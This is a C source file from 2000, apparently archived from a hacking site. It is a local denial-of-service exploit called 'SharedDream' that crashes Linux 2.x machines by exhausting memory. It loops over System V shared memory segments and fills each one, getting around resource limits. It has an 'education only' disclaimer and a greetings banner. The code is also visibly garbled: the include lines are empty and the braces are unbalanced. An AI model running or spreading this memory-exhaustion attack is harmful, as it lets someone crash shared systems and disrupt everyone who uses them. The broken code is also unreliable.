/* SharedDream - (c) Shadow, KKI Security [2000]*/ /* [2000]*/ /* I'm not responsible for any damaged done by this proggie... [2000]*/ /* It should be used only for education... [2000]*/ /* To protect - use brain, Solar's patches, or whatever... [2000]*/ /* This problem is because shared memory segments can exist even [2000]*/ /* if they are not combined with programs! [2000]*/ /* !This program will crash your machine (localy) at kernels 2.x! [2000]*/ /* If you are on kernels 2.2.x with limits run it twice :) [2000]*/ /* really - even when rescource limits are set! :) [2000]*/ /* Probably original idea by lcamtuf [2000]*/ /* heck you should told me that you found it [2000]*/ /* first ;) [2000]*/ /* heh - worm greetings for for coding style ;) [2000]*/ #include #include #include #include #define BOLD "\033[00;04m" #define BLUE "\033[00;36m" #define STAN "\033[00;00m" void main(void) { char *p; int i = 10000000; printf("\n\n"); printf(BOLD "*)" BLUE " SharedDream"STAN" - shared memory segments abuser\n"); printf(BOLD "*)\n" STAN); printf(BOLD "*)" STAN " (c) 1999" BOLD " Shadow " STAN "(" BOLD "shadow@security.kki.pl" STAN ")\n"); printf(BOLD "*)" STAN " greetz to " BOLD " vision (yo remember me), lcamtuf, kodzak, #??? ppl, Lam3rz, daworm, Trolinka, viedzmin other folks i forgot to mention\n" STAN); printf(BOLD "*)" STAN " Now it will eat up your memory even if it seems to be limited\n"); printf(BOLD "*)" STAN " Starting..."); fflush(stdout); while (1) if (p = shmat(shmget(0, i, 0777), 0, 0)) memset( p,'\0',i); // need to touch memory somehow printf(".DoW."); fflush(stdout); } else { i--; } } exit(0); } } /* www.hack.co.za [2000]*/